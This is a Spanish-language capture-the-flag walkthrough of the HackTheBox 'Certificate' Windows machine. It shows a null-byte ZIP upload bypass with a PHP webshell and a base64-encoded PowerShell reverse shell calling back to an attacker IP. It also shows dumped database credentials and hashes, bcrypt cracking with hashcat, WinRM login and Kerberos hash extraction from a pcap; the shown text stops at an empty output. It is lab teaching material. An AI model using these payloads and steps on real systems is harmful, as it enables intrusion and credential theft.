This page looks best with JavaScript enabled

HackTheBox - Certificate

En Certificate realizamos Bypass a un filtro en el sitio web para la subida de archivos a traves de un archivo ZIP para el acceso inicial. Credenciales en la base de datos del sitio permitieron obtener acceso a un primer usuario. Con los permisos de este ultimo realizamos Shadow Credential Attack para obtener acceso a dos usuarios. Uno de estos usuarios tenia el permiso SeManageVolume el cual explotamos lo que nos dio acceso al Certificate Authority (CA), utilizamos este para realizar Golden Certificate Attack para escalar privilegios.

Nombre Certificate box_img_maker
OS

Windows

Puntos 40
Dificultad Hard
Fecha de Salida 2025-05-31
IP 10.10.11.71
Maker

Spectra199

Rated
{
    "type": "bar",
    "data":  {
        "labels": ["Cake", "VeryEasy", "Easy", "TooEasy", "Medium", "BitHard","Hard","TooHard","ExHard","BrainFuck"],
        "datasets": [{
            "label": "User Rated Difficulty",
            "data": [41, 16, 79, 196, 295, 378, 621, 296, 65, 67],
            "backgroundColor": ["#9fef00","#9fef00","#9fef00", "#ffaf00","#ffaf00","#ffaf00","#ffaf00", "#ff3e3e","#ff3e3e","#ff3e3e"]
        }]
    },
    "options": {
        "scales": {
          "xAxes": [{"display": false}],
          "yAxes": [{"display": false}]
        },
        "legend": {"labels": {"fontColor": "white"}},
        "responsive": true
      }
}

Recon

nmap

nmap muestra multiples puertos abiertos: dns (53), kerberos (88), ldap (389), smb (445) http (80) y winrm (5985).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
# Nmap 7.95 scan initiated Sun Jun  1 17:08:00 2025 as: /usr/lib/nmap/nmap --privileged -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49691,49692,49693,49712,49719,49744 -sV -sC -oN nmap_scan 10.10.11.71
Nmap scan report for 10.10.11.71
Host is up (0.087s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        (generic dns response: SERVFAIL)
| fingerprint-strings: 
|   DNS-SD-TCP: 
|     _services
|     _dns-sd
|     _udp
|_    local
80/tcp    open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
|_http-title: Did not follow redirect to http://certificate.htb/
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-02 05:08:07Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-02T05:09:39+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-02T05:09:38+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-02T05:09:39+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
|_ssl-date: 2025-06-02T05:09:38+00:00; +8h00m00s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49691/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49693/tcp open  msrpc         Microsoft Windows RPC
49712/tcp open  msrpc         Microsoft Windows RPC
49719/tcp open  msrpc         Microsoft Windows RPC
49744/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.95%I=7%D=6/1%Time=683CC145%P=x86_64-pc-linux-gnu%r(DNS-S
SF:D-TCP,30,"\0\.\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_services\x07_dns-sd\x04_
SF:udp\x05local\0\0\x0c\0\x01");
Service Info: Hosts: certificate.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-06-02T05:09:01
|_  start_date: N/A
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun  1 17:09:39 2025 -- 1 IP address (1 host up) scanned in 98.90 seconds

Agregamos a nuestro archivo /etc/hosts los valores certificate.htb DC01.certificate.htb.

Web Site

El sitio web nos redirige al dominio certificate.htb.

1
2
3
4
5
6
7
8
❯ curl -sI 10.10.11.71
HTTP/1.1 301 Moved Permanently
Date: Fri, 06 Jun 2025 13:31:09 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Location: http://certificate.htb/
Content-Type: text/html; charset=iso-8859-1

Al visitar el sitio este muestra una “plataforma” de aprendizaje.

image

Encontramos un formulario de registro donde se muestra la opcion para estudiante y maestro.

image

Tambien un formulario de login.

image

Directory Brute Forcing

feroxbuster nos muestra recursos estaticos y paginas PHP.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
❯ feroxbuster -u http://certificate.htb/ -w $MD
                                                                                                                                                                                        
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://certificate.htb/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       33w      301c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       30w      304c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      351l      795w     6951c http://certificate.htb/static/css/magnific-popup.css
200      GET        8l       36w     1067c http://certificate.htb/static/js/jquery.counterup.min.js
200      GET      536l      897w     8362c http://certificate.htb/static/css/linearicons.css
200      GET       39l      161w    11004c http://certificate.htb/static/img/play-btn.png
200      GET      138l      371w     4007c http://certificate.htb/static/css/nice-select.css
200      GET        6l       60w     6864c http://certificate.htb/static/js/parallax.min.js
200      GET        4l       42w     2942c http://certificate.htb/static/js/jquery.nice-select.min.js
200      GET        8l      165w     8044c http://certificate.htb/static/js/waypoints.min.js
200      GET        1l       65w     3421c http://certificate.htb/static/js/hexagons.min.js
200      GET        8l       61w     2244c http://certificate.htb/static/img/fav.png
200      GET      120l      339w     4820c http://certificate.htb/static/js/jquery.ajaxchimp.min.js
200      GET       12l      123w     9957c http://certificate.htb/static/css/hexagons.min.css
200      GET        4l       66w    31000c http://certificate.htb/static/css/font-awesome.min.css
200      GET       52l      357w    29458c http://certificate.htb/static/img/popular-course/p2.jpg
200      GET      262l      758w     6638c http://certificate.htb/static/js/main.js
200      GET        4l      212w    20216c http://certificate.htb/static/js/jquery.magnific-popup.min.js
200      GET        2l      276w    40401c http://certificate.htb/static/js/owl.carousel.min.js
200      GET      172l      535w     5739c http://certificate.htb/static/js/jquery.sticky.js
200      GET      256l      786w    10916c http://certificate.htb/register.php
200      GET      173l      431w     4112c http://certificate.htb/static/css/owl.carousel.css
200      GET      263l      754w    10605c http://certificate.htb/contacts.php
200      GET      230l      663w     9412c http://certificate.htb/login.php
200      GET      372l     1136w    14826c http://certificate.htb/about.php
200      GET      253l     1031w    82362c http://certificate.htb/static/img/header-img.png
200      GET        7l      579w    51041c http://certificate.htb/static/js/vendor/bootstrap.min.js
200      GET      379l     1681w   135079c http://certificate.htb/static/img/popular-course/p3.jpg
200      GET      550l     2616w   217483c http://certificate.htb/static/img/popular-course/p4.jpg
200      GET        4l     1338w    85577c http://certificate.htb/static/js/vendor/jquery-2.2.4.min.js
200      GET      463l     2482w   191761c http://certificate.htb/static/img/blog-post/b1.jpg
301      GET        9l       30w      343c http://certificate.htb/static => http://certificate.htb/static/
200      GET      258l     1568w   104321c http://certificate.htb/static/img/blog-post/b2.jpg
200      GET      550l     2616w   217483c http://certificate.htb/static/img/blog-post/b3.jpg
302      GET        0l        0w        0c http://certificate.htb/course-details.php => login.php
200      GET      565l     1566w    21940c http://certificate.htb/blog.php
200      GET     9314l    16684w   183481c http://certificate.htb/static/css/bootstrap.css
200      GET      994l     5780w   454992c http://certificate.htb/static/img/popular-course/p1.jpg
200      GET     1689l     5952w   427424c http://certificate.htb/static/img/video-img.jpg
301      GET        9l       30w      347c http://certificate.htb/static/img => http://certificate.htb/static/img/
200      GET      582l     1643w    22420c http://certificate.htb/index.php
301      GET        9l       30w      351c http://certificate.htb/static/uploads => http://certificate.htb/static/uploads/
200      GET     3164l     8872w    82142c http://certificate.htb/static/css/main.css
200      GET      582l     1643w    22420c http://certificate.htb/
301      GET        9l       30w      347c http://certificate.htb/static/css => http://certificate.htb/static/css/
503      GET       11l       44w      404c http://certificate.htb/examples
301      GET        9l       30w      346c http://certificate.htb/static/js => http://certificate.htb/static/js/
403      GET       11l       47w      423c http://certificate.htb/licenses
301      GET        9l       30w      352c http://certificate.htb/static/img/blog => http://certificate.htb/static/img/blog/
301      GET        9l       30w      352c http://certificate.htb/static/img/Blog => http://certificate.htb/static/img/Blog/
301      GET        9l       30w      349c http://certificate.htb/static/fonts => http://certificate.htb/static/fonts/
301      GET        9l       30w      356c http://certificate.htb/static/img/elements => http://certificate.htb/static/img/elements/
301      GET        9l       30w      347c http://certificate.htb/static/IMG => http://certificate.htb/static/IMG/
301      GET        9l       30w      353c http://certificate.htb/static/js/vendor => http://certificate.htb/static/js/vendor/
301      GET        9l       30w      352c http://certificate.htb/static/IMG/blog => http://certificate.htb/static/IMG/blog/
301      GET        9l       30w      352c http://certificate.htb/static/IMG/Blog => http://certificate.htb/static/IMG/Blog/
301      GET        9l       30w      357c http://certificate.htb/static/IMG/blog-post => http://certificate.htb/static/IMG/

Web Application

Realizamos el registro de un nuevo usuario para la aplicacion.

image

Se muestra la direccion Courses en el navbar, tras visitar esta pagina se encuentran varios cursos.

image

Inscribimos al usuario a uno de los cursos.

image

Tras ello encontramos nuevas opciones debajo de la descripcion.

image

Upload Files

Encontramos que es posible realizar la subida de archivos: pdf docx pptx xlxs zip.

image

Realizamos la subida de un archivo PDF, tras ello nos muestra que un enlace para descargar el archivo.

image

Tras ejecutar exiftool para verificar los metadatos se muestra que se utilizo pdfmake.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
❯ wget http://certificate.htb/static/uploads/74bc46a04239a53253fcbcc9f7f7e1a2/file.pdf -o output.pdf
❯ exiftool ~/Downloads/file.pdf
ExifTool Version Number         : 13.25
File Name                       : file.pdf
Directory                       : /home/kali/Downloads
File Size                       : 4.4 kB
File Modification Date/Time     : 2025:06:05 23:44:45-06:00
File Access Date/Time           : 2025:06:05 23:44:55-06:00
File Inode Change Date/Time     : 2025:06:05 23:44:55-06:00
File Permissions                : -rw-rw-r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.3
Linearized                      : No
Page Count                      : 1
Producer                        : pdfmake
Creator                         : pdfmake
Create Date                     : 2025:06:06 05:44:45Z

Encontramos el CVE-2024-25180. Se muestra refiere un PoC, pero tambien que no afecta a pdfmake.

image

No se aceptan archivos con codigo PHP.

image

Incluso si le cambiamos el Content-Type.

image

Se aceptan archivos ZIP, anadimos el archivo pdf dentro de uno.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
❯ zip pdfinzip.zip file.pdf
  adding: file.pdf (deflated 23%)
❯ unzip -l pdfinzip.zip
Archive:  pdfinzip.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
     4432  2025-06-05 23:56   file.pdf
---------                     -------
     4432                     1 file

Al subir el archivo este es extraido y muestra el enlace.

image

Bypass ZIP - Upload Files

Utilizamos Null Bytes como en Zipping para realizar la subida de un archivo PHP. Iniciando con la creacion de un archivo PHP con la ejecucion de un whoami con el nombre file.phpA.pdf, A es el valor que estariamos editando en Burpsuite. Finalmente lo agregamos a un archivo zip.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
echo "<?php echo(system('whoami'));?>" > file.phpA.pdf
❯ zip whoami.zip file.phpA.pdf
  adding: file.phpA.pdf (stored 0%)
❯ unzip -l whoami.zip
Archive:  whoami.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
       32  2025-06-05 23:59   file.phpA.pdf
---------                     -------
       32                     1 file

Realizamos la subida e interceptamos la solicitud en Burpsuite donde, con la vista HEX editamos A o 41 a un valor nulo o 00 y enviamos.

image

Observamos que el enlace muestra un espacio entre extensiones y tras visitarlo este no existe.

image

image

Quitando el espacio y extension este muestra el codigo ejecutado por PHP.

image

User - xamppuser

Generamos una shell inversa de powershell con revshells la agregamos para su ejecucion a un archivo zip, realizamos bypass y ejecutamos el codigo visitando index.php.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
❯ cat index.phpA.pdf
<?php system('powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOAA4ACIALAAxADMAMwA4ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=='); ?>
❯ zip index.zip index.phpA.pdf
❯ unzip -l index.zip
Archive:  index.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
     1371  2025-06-05 03:28   index.phpA.pdf
---------                     -------
     1371                     1 file

Con ello logramos obtener una shell inversa como xamppuser.

1
2
3
4
5
6
7
8
❯ rlwrap nc -lvp 1338
listening on [any] 1338 ...
connect to [10.10.14.88] from certificate.htb [10.10.11.71] 49467
whoami
certificate\xamppuser
PS C:\xampp\htdocs\certificate.htb\static\uploads\e856444acad300e34e36ddb8ec6ab56e> whoami
certificate\xamppuser
PS C:\xampp\htdocs\certificate.htb\static\uploads\e856444acad300e34e36ddb8ec6ab56e>

Database

Dentro del archivo de configuracion de la base de datos encontramos las credenciales.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
PS C:\xampp\htdocs\certificate.htb> cat db.php
<?php
// Database connection using PDO
try {
    $dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4';
    $db_user = 'certificate_webapp_user'; // Change to your DB username
    $db_passwd = 'cert!f!c@teDBPWD'; // Change to your DB password
    $options = [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    ];
    $pdo = new PDO($dsn, $db_user, $db_passwd, $options);
} catch (PDOException $e) {
    die('Database connection failed: ' . $e->getMessage());
}
?>
PS C:\xampp\htdocs\certificate.htb>

Utilizamos estas para acceder a la base de datos de la aplicacion web utilizando mysql, encontramos usuario y hash de contrasena.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
PS C:\xampp\mysql\bin> .\mysql.exe -u certificate_webapp_user -p'cert!f!c@teDBPWD' -D Certificate_WEBAPP_DB -e 'show tables;'
Tables_in_certificate_webapp_db
course_sessions
courses
users
users_courses
PS C:\xampp\mysql\bin> .\mysql.exe -u certificate_webapp_user -p'cert!f!c@teDBPWD' -D Certificate_WEBAPP_DB -e 'describe users;'
Field	Type	Null	Key	Default	Extra
id	int(11)	NO	PRI	NULL	auto_increment
first_name	varchar(50)	NO		NULL	
last_name	varchar(50)	NO		NULL	
username	varchar(50)	NO	UNI	NULL	
email	varchar(50)	NO	UNI	NULL	
password	varchar(255)	NO		NULL	
created_at	timestamp	YES		current_timestamp()	
role	enum('student','teacher','admin')	YES		NULL	
is_active	tinyint(1)	NO		1	
PS C:\xampp\mysql\bin> .\mysql.exe -u certificate_webapp_user -p'cert!f!c@teDBPWD' -D Certificate_WEBAPP_DB -e 'select username,password from users;'
username	password
Lorra.AAA	$2y$04$bZs2FUjVRiFswY84CUR8ve02ymuiy0QD23XOKFuT6IM2sBbgQvEFG
Sara1200	$2y$04$pgTOAkSnYMQoILmL6MRXLOOfFlZUPR4lAD2kvWZj.i/dyvXNSqCkK
Johney	$2y$04$VaUEcSd6p5NnpgwnHyh8zey13zo/hL7jfQd9U.PGyEW3yqBf.IxRq
havokww	$2y$04$XSXoFSfcMoS5Zp8ojTeUSOj6ENEun6oWM93mvRQgvaBufba5I5nti
stev	$2y$04$6FHP.7xTHRGYRI9kRIo7deUHz0LX.vx2ixwv0cOW6TDtRGgOhRFX2
sara.b	$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6
sckull	$2y$04$9WYRArAMSEFnZN9FImj/3.w.aqt4uq78nqROuenyiqFv23Ir3fktm
PS C:\xampp\mysql\bin>

Cracking the Hash

Ejecutamos hashcat con el wordlist rockyou.txt sobre el archivo de hash. Unicamente encontramos el valor de contrasena para sara.b.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
C:\Users\sckull\Documents\hashcat-6.2.6>hashcat.exe -m 3200 ../hash/certificate_hash_db rockyou.txt
hashcat (v6.2.6) starting

[... snip ...]

Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6:Blink182
Cracking performance lower than expected?

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>

Session..........: hashcat
Status...........: Running
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: ../hash/certificate_hash_db
Time.Started.....: Mon Jun 02 01:44:27 2025 (38 secs)
Time.Estimated...: Mon Jun 02 01:59:16 2025 (14 mins, 11 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    80671 H/s (6.34ms) @ Accel:2 Loops:8 Thr:24 Vec:1
Recovered........: 1/6 (16.67%) Digests (total), 1/6 (16.67%) Digests (new), 1/6 (16.67%) Salts
Progress.........: 3623040/86066310 (4.21%)
Rejected.........: 0/3623040 (0.00%)
Restore.Point....: 603648/14344385 (4.21%)
Restore.Sub.#1...: Salt:2 Amplifier:0-1 Iteration:8-16
Candidate.Engine.: Device Generator
Candidates.#1....: papasito3 -> osteoporosis
Hardware.Mon.#1..: Temp: 42c Fan:  0% Util: 93% Core:2775MHz Mem:8250MHz Bus:8

Approaching final keyspace - workload adjusted.


Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: ../hash/certificate_hash_db
Time.Started.....: Mon Jun 02 01:44:27 2025 (14 mins, 46 secs)
Time.Estimated...: Mon Jun 02 01:59:13 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    81175 H/s (6.08ms) @ Accel:2 Loops:8 Thr:24 Vec:1
Recovered........: 1/6 (16.67%) Digests (total), 1/6 (16.67%) Digests (new), 1/6 (16.67%) Salts
Progress.........: 86066310/86066310 (100.00%)
Rejected.........: 4716/86066310 (0.01%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:5 Amplifier:0-1 Iteration:8-16
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[20204a4f53452020] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Temp: 46c Fan: 30% Util: 95% Core:2775MHz Mem:8250MHz Bus:8

Started: Mon Jun 02 01:44:21 2025
Stopped: Mon Jun 02 01:59:14 2025

C:\Users\sckull\Documents\hashcat-6.2.6>

User - Sara.B

Encontramos que la contrasena es valida para los servicio smb, ldap y winrm.

1
2
3
4
5
6
7
8
9
❯ netexec smb 10.10.11.71 -u users.txt -p 'Blink182' --continue-on-success | grep '[+]'
SMB                      10.10.11.71     445    DC01             [+] certificate.htb\Sara.B:Blink182 
❯ netexec ldap 10.10.11.71 -u users.txt -p 'Blink182' --continue-on-success | grep '[+]'
LDAP                     10.10.11.71     389    DC01             [+] certificate.htb\Sara.B:Blink182 
❯ netexec winrm 10.10.11.71 -u users.txt -p 'Blink182' --continue-on-success 2>/dev/null | grep '[+]'
WINRM                    10.10.11.71     5985   DC01             [+] certificate.htb\Sara.B:Blink182 (Pwn3d!)

Logramos acceso a la maquina mediante evil-winrm.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
❯ evil-winrm -i certificate.htb -u sara.b -p Blink182
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Sara.B\Documents> whoami
certificate\sara.b
*Evil-WinRM* PS C:\Users\Sara.B\Documents>

PCAP Fail

En el directorio de sara.b encontramos un archivo que menciona el acceso a un recurso compartido de SMB donde ingresan credenciales valida y no validas, tambien vemos un archivo .pcap el cual descargamos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
*Evil-WinRM* PS C:\users\sara.b\Documents\WS-01> dir -force


    Directory: C:\users\sara.b\Documents\WS-01


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        11/4/2024  12:44 AM            530 Description.txt
-a----        11/4/2024  12:45 AM         296660 WS-01_PktMon.pcap


*Evil-WinRM* PS C:\users\sara.b\Documents\WS-01> cat Description.txt
The workstation 01 is not able to open the "Reports" smb shared folder which is hosted on DC01.
When a user tries to input bad credentials, it returns bad credentials error.
But when a user provides valid credentials the file explorer freezes and then crashes!
*Evil-WinRM* PS C:\users\sara.b\Documents\WS-01> download WS-01_PktMon.pcap
                                        
Info: Downloading C:\users\sara.b\Documents\WS-01\WS-01_PktMon.pcap to WS-01_PktMon.pcap
                                        
Info: Download successful!
*Evil-WinRM* PS C:\users\sara.b\Documents\WS-01>

Wireshark muestra que existen conexiones por smb y kerberos.

image

image

Ejecutamos Krb5RoastParser para extraer hashes.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
❯ python krb5_roast_parser.py
Usage: python roasting.py <pcap_file> <as_req/as_rep/tgs_rep>
❯ python krb5_roast_parser.py WS-01_PktMon.pcap as_req > as_req.txt
❯ python krb5_roast_parser.py WS-01_PktMon.pcap as_rep > as_rep.txt
❯ python krb5_roast_parser.py WS-01_PktMon.pcap tgs_rep > tgs_rep.txt
❯ cat as_req.txt
$krb5pa$18$Lion.SK$CERTIFICATE$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0
❯ cat as_rep.txt
$krb5asrep$23$Lion.SK@CERTIFICATE.HTB:7a4181856efd330c4003a769c2f35024$d28d2d2babbcccd434f3c0a96963b85964f1177913f2b8dfe46a1478ddcfbfab16a53a1910baabd8e6b246ed194e957070a3cbeffbea5447cc97b33e6b473fd73629e7ecca7f56fe353333138375c2317d153e912c9f282382a842aec7a9f6a70714c983093950e6e43fa3b5fc92f0faa7ecaae688467388bbda5e7e596ec74680a72955e912cd8431b7849ab005d2a4aba74c7336aafa25dd05db3d4a5e74e5725de166f24b385af1333a131f25e8dbf07a96abb175707ac4839c6e4e7b9de9f7b23d7c05af250a103bbeb835cb23a1eaeace9d9f018a9f23ea5827ce6523326b2895860d23df2877e25d0311ecce8ec6b1274ea43188f9012d57d252f7eaa141a687b5c754f907be8e7ed7a33d41cc77b9ccfb0b5752e01256340b7fe8ada81122cd85038422d95313fa1b0dc480e58a8dd6dce273de596b33f6
❯ cat tgs_rep.txt
